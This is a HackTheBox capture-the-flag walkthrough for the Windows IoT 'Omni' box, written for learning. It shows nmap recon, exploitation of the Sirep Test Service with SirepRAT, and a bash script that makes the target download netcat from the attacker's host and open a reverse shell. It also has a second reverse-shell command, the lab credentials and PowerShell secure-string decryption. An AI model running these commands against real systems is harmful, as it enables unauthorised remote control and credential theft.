HackTheBox Omni Walkthrough

Omni is a very interesting and unique box featuring windows IoT platform and powershell based secure strings.

---------------------------------
--- Name       : Omni -----------
--- IP Address : 10.10.10.204 ---
--- Platform   : Windows IoT ----
--- Difficulty : Easy -----------
---------------------------------

Reconnaissance

Fast scan using FinalRecon followed by full port range scan and service scans using nmap

$ finalrecon --ps http://10.10.10.204

 ______  __   __   __   ______   __
/\  ___\/\ \ /\ "-.\ \ /\  __ \ /\ \
\ \  __\\ \ \\ \ \-.  \\ \  __ \\ \ \____
 \ \_\   \ \_\\ \_\\"\_\\ \_\ \_\\ \_____\
  \/_/    \/_/ \/_/ \/_/ \/_/\/_/ \/_____/
 ______   ______   ______   ______   __   __
/\  == \ /\  ___\ /\  ___\ /\  __ \ /\ "-.\ \
\ \  __< \ \  __\ \ \ \____\ \ \/\ \\ \ \-.  \
 \ \_\ \_\\ \_____\\ \_____\\ \_____\\ \_\\"\_\
  \/_/ /_/ \/_____/ \/_____/ \/_____/ \/_/ \/_/

[>] Created By : thewhiteh4t
[>] Version    : 1.0.7

[+] Checking for Updates...[ Up-To-Date ]

[+] Target : http://10.10.10.204

[!] Starting Port Scan...

[+] Testing Top 1000 Ports...

[+] 135    epmap
[+] 8080   http-alt

[+] Completed in 0:00:03.528434
$ nmap -p- -T4 10.10.10.204 -Pn

Nmap scan report for 10.10.10.204
Host is up (0.082s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
5985/tcp  open  wsman
8080/tcp  open  http-proxy
29817/tcp open  unknown
29819/tcp open  unknown
29820/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 90.70 seconds
$ nmap -p 135,5985,8080,29817,29819,29820 -sV -T4 10.10.10.204 -Pn

Nmap scan report for 10.10.10.204
Host is up (0.082s latency).

PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.61 seconds

At this point I found that it is running Windows and Microsoft IIS Server. Next I accessed port 8080 in the browser and it shows a Basic HTTP Authentication prompt with an interesting string : "Windows Device Portal"

Windows Device Portal

The Windows Device Portal (WDP) is a web server included with Windows devices that lets you configure and manage the settings for the device over a network or USB connection (local connections are also supported on devices with a web browser). These windows devices include XBox, HoloLens and IoT.

The documentation also shows set up instructions for "Windows 10 IoT Dashboard". This discovery lead to another discovery, Windows 10 IoT Core, it is a trimmed down version of windows 10 which is optimized for smaller devices without a display and supports ARM/x86/x64 architectures.

Now I started looking for vulnerabilities and exploits for this OS and came across SirepRAT.

SirepRat exploits the Sirep Test Service that’s built in and running on the official images offered at Microsoft’s site. This service is the client part of the Hardware Lab Kit (HLK) setup one may build in order to perform driver/hardware tests on the IoT device. It serves the Sirep/WPCon/TShell protocol.

Read More
Download SirepRat

# Get system information from device
####################################

$ python SirepRAT.py 10.10.10.204 GetSystemInformationFromDevice
# Command Execution
###################

$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"

Intrusion

For getting a reverse shell I created a small script to make things easier and automated, below is the code...

#!/bin/bash

LHOST="10.10.14.26"
LPORT="8090"
RHOST="10.10.10.204"
SRVPORT="8080"

echo "[+] Starting Python Server..."
(python3 -m http.server $SRVPORT > /dev/null 2>&1) &

echo "[+] Uploading Binary..."
python SirepRAT.py $RHOST LaunchCommandWithOutput --return_output --cmd "cmd.exe" --args " /c powershell Invoke-WebRequest -OutFile c:\windows\system32\nc64.exe -Uri http://$LHOST:$SRVPORT/nc64.exe" --v > /dev/null

echo "[+] Triggering Reverse Shell..."
(sleep 2 && python SirepRAT.py $RHOST LaunchCommandWithOutput --return_output --cmd "cmd.exe" --args " /c nc64.exe $LHOST $LPORT -e cmd.exe" --v > /dev/null) &

echo "[+] Starting Listener..."
echo
nc -lvp $LPORT

It automatically uploads 64 bit version of netcat to the target machine and executes it and catches the shell with netcat.

Enumeration

I switched to powershell and extracted some basic information about the target like username, computer name and most importantly powershell version because command syntax differs from version to version, below we can see it's version 5.1

$env:UserName
$env:ComputerName
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$PSVersionTable

Since we have admin privileges I tried to read the root flag...

Similar content was present in user flag as well so I enumerated further and found an interesting file which again contains similar content but it looks like admin credentials...

On further enumeration I found a hidden file and this is where powershell is extremely useful...

ls -force
app:mesh5143
administrator:_1nt3rn37ofTh1nGz

Here as you can see i got credentials for administrator! If you remember I found HTTP basic auth before I tried to login with these credentials and got access to the IoT dashboard!

Privilege Escalation

Using the Run Command functionality in the dashboard I got a new reverse connection as administrator this time!

c:\windows\system32\nc64.exe 10.10.14.26 4444 -e powershell.exe

At this point all I had to do was figure out how to decrypt powershell secure string. After numerous google searches I found these articles which helped in understanding the secure strings and ways to decode them

Read more
Decrypt PowerShell Secure String Password
Using the PowerShell Get-Credential Cmdlet and all things credentials

I found two credentials earlier, to decode user flag I logged in as "app" in the dashboard and to decode root flag I logged in as "administrator" with their respective passwords and launched two separate netcat sessions to catch reverse shells, this can be done without using reverse shell, directly from the web console too!

# User Flag [app:mesh5143]
###########


$flag = Import-Clixml -Path C:\Data\Users\app\user.txt
$flag.GetNetworkCredential().Password

# Root Flag [administrator:_1nt3rn37ofTh1nGz]
###########

$flag = Import-Clixml -Path C:\Data\Users\administrator\root.txt
$flag.GetNetworkCredential().Password